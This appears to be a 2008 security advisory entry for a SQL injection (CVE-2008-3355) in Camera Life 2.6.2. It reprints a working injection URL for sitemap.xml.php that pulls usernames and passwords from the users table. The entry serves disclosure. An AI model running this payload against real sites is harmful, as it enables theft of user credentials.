|
|
| Details : SecurityAlert |
|
|
Topic : | Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability
|
SecurityAlert : 4047
CVE : CVE-2008-3355
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : Yes
Credit : nuclear
Published : 30.07.2008
Affected Software : | Camera Life, Camera Life, 2.6.2 |
 Advisory Text : #Camera Life 2.6.2(id) Sql Injection Vulnerability
#Author: nuclear
#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip
#exploit: sitemap.xml.php?page=photos&id=999999 union select
concat(username,0x3a,password),null from users --
#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack,
Digitalfortress, and me :P
References :
http://www.milw0rm.com/exploits/6132
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|